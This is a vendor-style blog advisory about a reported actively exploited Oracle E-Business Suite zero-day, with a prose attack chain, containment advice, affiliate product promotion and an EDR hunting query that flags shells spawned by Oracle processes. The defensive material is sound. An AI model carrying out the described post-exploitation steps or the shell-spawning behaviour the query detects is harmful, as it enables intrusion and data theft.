CODE RED • NCSC CRITICAL WARNING

      NCSC CRITICAL WARNING: Oracle E-Business Suite 0-Day Actively Exploited in the Wild    

By CyberDudeBivash • October 06, 2025 • Urgent Security Directive

 cyberdudebivash.com |       cyberbivash.blogspot.com 

Share on XShare on LinkedIn

Disclosure: This is an urgent security advisory for enterprise IT and security leaders. It contains affiliate links to relevant security solutions. Your support helps fund our independent research.

 Emergency Guide: Table of Contents 

1. Chapter 1: The Alarm Bells Are Ringing — The NCSC Issues Critical Warning
2. Chapter 2: The Attacker’s Playbook — From Exploit to Enterprise Compromise
3. Chapter 3: The NCSC’s Directive — An Immediate Containment and Hunting Plan
4. Chapter 4: The Strategic Imperative — Defending Tier-0 Assets

Chapter 1: The Alarm Bells Are Ringing — The NCSC Issues Critical Warning

The UK’s National Cyber Security Centre (NCSC) has issued a critical alert regarding active, in-the-wild exploitation of a new, unpatched zero-day vulnerability in Oracle E-Business Suite (EBS). This is the highest level of warning a national CERT can issue. It indicates that they, along with their international partners, have concrete intelligence that sophisticated threat actors are successfully compromising organizations using this flaw, which we have been tracking as **CVE-2025-22998**.

As we warned when the **public PoC was released**, any unpatched, internet-facing EBS instance is at extreme risk. This NCSC alert confirms that the risk is no longer theoretical; it is an active, ongoing campaign.

Chapter 2: The Attacker’s Playbook — From Exploit to Enterprise Compromise

The goal of the attackers is a full takeover of your enterprise’s “crown jewel” data. The TTPs are consistent with elite data extortion groups like **Cl0p** and nation-state espionage actors.

1. **Exploitation:** The attacker uses the unauthenticated RCE to gain an initial foothold on the EBS server.
2. **Payload Deployment:** They deploy a stealthy backdoor, such as a webshell or an in-memory implant, to establish persistent access.
3. **Credential Dumping:** They use tools like Mimikatz to dump credentials from the server’s memory, seeking the credentials of a Domain Administrator.
4. **Lateral Movement:** Using the stolen credentials, they pivot from the EBS server to the core of the network, most notably the Domain Controllers.
5. **Data Exfiltration/Ransomware:** The attacker achieves their final objective: exfiltrating the entire contents of the ERP database for extortion, or deploying ransomware across the entire enterprise.

Chapter 3: The NCSC’s Directive — An Immediate Containment and Hunting Plan

With no patch available, the official guidance is focused on containment and detection. You must act now.

1. IMMEDIATE NETWORK CONTAINMENT

This is the only guaranteed way to stop the initial attack. Your Oracle EBS web interface ports **must not be accessible from the public internet.** Use your perimeter firewall or WAF to block all access from untrusted networks immediately.

2. HUNT FOR COMPROMISE (Assume Breach)

You must assume your systems have been targeted. The NCSC urges all EBS customers to immediately begin proactive threat hunting. The highest-fidelity indicator is seeing the core Oracle process spawn a shell. Use your EDR platform to run this query across all EBS servers:

ParentProcess IN ('ebs_process', 'ias_process', 'frmweb.exe') AND ProcessName IN ('cmd.exe', 'powershell.exe', '/bin/bash', '/bin/sh')

3. MONITOR FOR A PATCH

Continuously monitor Oracle’s official security advisories for an emergency patch and be prepared to deploy it the moment it is released.

Chapter 4: The Strategic Imperative — Defending Tier-0 Assets

An NCSC alert for an actively exploited zero-day in your core ERP system is a board-level issue. It is the ultimate test of your security program’s resilience. A strategy that relies purely on preventative controls has already failed. Your ability to survive this event depends entirely on your **detection and response** capabilities.

This incident is the ultimate justification for investing in a mature, proactive security operation built on a **Zero Trust** architecture and powered by an **XDR platform**. Can you see what an attacker does *after* they bypass your firewall? Can you contain their lateral movement? These are the questions that determine survival.

 Detect the Post-Exploitation Phase: An XDR platform is your essential safety net for post-breach investigation. A solution like **Kaspersky’s XDR** provides the deep behavioral visibility needed to detect the attacker’s TTPs—credential dumping, lateral movement, and data exfiltration—before they can achieve their final objective.  

Get Urgent Zero-Day Alerts

Subscribe for real-time alerts, vulnerability analysis, and CISO-level strategic insights.         Subscribe  

About the Author

CyberDudeBivash is a cybersecurity strategist with 15+ years in enterprise application security, incident response, and threat intelligence, advising CISOs of Fortune 500 companies across APAC. [Last Updated: October 06, 2025]

  #CyberDudeBivash #Oracle #EBS #ZeroDay #RCE #CVE #CyberSecurity #NCSC #ThreatIntel #InfoSec #IncidentResponse